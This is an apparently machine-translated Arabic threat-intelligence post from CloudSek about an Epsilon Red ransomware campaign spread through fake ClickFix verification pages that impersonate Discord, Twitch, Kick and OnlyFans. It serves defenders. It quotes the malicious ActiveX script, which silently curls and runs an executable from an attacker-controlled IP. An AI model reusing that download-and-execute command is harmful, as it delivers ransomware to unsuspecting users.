🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
اكتشفت CloudSek حملة Epsilon Red جديدة لبرامج الفدية تستهدف المستخدمين على مستوى العالم عبر صفحات التحقق المزيفة من ClickFix. نشط منذ يوليو 2025، ويستخدم ممثلو التهديد الهندسة الاجتماعية وينتحلون منصات مثل Discord و Twitch و OnlyFans لخداع المستخدمين لتنفيذ ملفات.HTA الضارة من خلال ActiveX. يؤدي هذا إلى تنزيل الحمولة الصامتة ونشر برامج الفدية. يتم حث المستخدمين على تعطيل ActiveX وحظر عناوين IP للمهاجمين والتدريب على مواجهة مثل هذه الإغراءات.
قم بمراقبة البرامج الضارة والدفاع عنها بشكل استباقي باستخدام وحدة CloudSek xvigil Malware Logs، مما يضمن سلامة أصولك الرقمية
Schedule a Demoأثناء البحث الروتيني عن البنية التحتية، كشفت TRIAD من CloudSek عن تحت عنوان كليكفيكس موقع تسليم البرامج الضارة قيد التطوير النشط، المرتبط بـ إبسيلون ريد رانسوم وير. على عكس الحملات السابقة التي تنسخ الأوامر إلى الحافظات، يحث هذا البديل الضحايا على زيارة صفحة ثانوية، حيث يتم تنفيذ أوامر shell الضارة بصمت عبر اكتيف إكس لتنزيل الحمولات وتشغيلها من عنوان IP يتحكم فيه المهاجم. تُستخدم أساليب الهندسة الاجتماعية، مثل رموز التحقق المزيفة، لتبدو حميدة. كشف التمحور حول البنية التحتية ذات الصلة عن انتحال شخصية خدمات مثل روبوت ديسكورد كابتشا، ركلة، نشل، و المعجبين فقط، بالإضافة إلى السحر ذي الطابع الرومانسي. تمت ملاحظة Epsilon Red لأول مرة في عام 2021 وهي مستوحاة بشكل فضفاض من ريفيل رانسومواري في تصميم مذكرة الفدية، ولكن بخلاف ذلك تبدو متميزة في تكتيكاتها وبنيتها التحتية.
خلال نشاطنا الروتيني للبحث عن البنية التحتية، اكتشفنا صفحة تسليم البرامج الضارة تحت عنوان clickfix كانت قيد التطوير.
عادةً، عند النقر فوق زر التحقق، يتم نسخ الأمر الضار إلى حافظة الضحية. ومع ذلك، في هذه الحالة، تم حث الضحية على فتح صفحة أخرى على نفس الموقع.
var shell = كائن نشط جديد («Wscript.shell»)؛
يسمح هذا الكائن بتنفيذ أوامر shell (cmd.exe).
shell.run («cmd /c cd /D %userprofile% &&curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe &a.exe «, 0)؛
Shell.run («تردد cmd /c رمز التحقق الخاص بك هو: pc-19fj5e9i-cje8i3e4 وإيقاف مؤقت»)؛
وقفة: تبقي نافذة CMD مفتوحة.
عند إدخال الرمز الصحيح الموضح في موجه الأوامر، تظهر الرسالة التالية في مربع الحوار.
التمحور من خلال بنيتها التحتية، لاحظنا أن الجهات الفاعلة في مجال التهديد تنتحل شخصية روبوت كابتشا الشهير (https://captcha.bot)، جنبًا إلى جنب مع مجموعة متنوعة من خدمات البث مثل Kick و Twitch و Rumble و Onlyfans وغيرها التي تقدم في الغالب حمولات Windows باستخدام Clickfix. بالإضافة إلى ذلك، تمكنا من العثور على مجموعة صغيرة من صفحات تسليم clickfix ذات الطابع الرومانسي/المواعدة والتي يديرها نفس ممثل التهديد.
يترك برنامج Epsilon Red ransomware، الذي تم تحديده لأول مرة في عام 2021، مذكرة فدية على أجهزة الكمبيوتر المصابة التي تشبه مذكرة ReVil ransomware، وإن كان ذلك مع تحسينات نحوية طفيفة. علاوة على ذلك، لم يتم ملاحظة أي أوجه تشابه واضحة أخرى بين Epsilon Red و ReVil ransomware.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.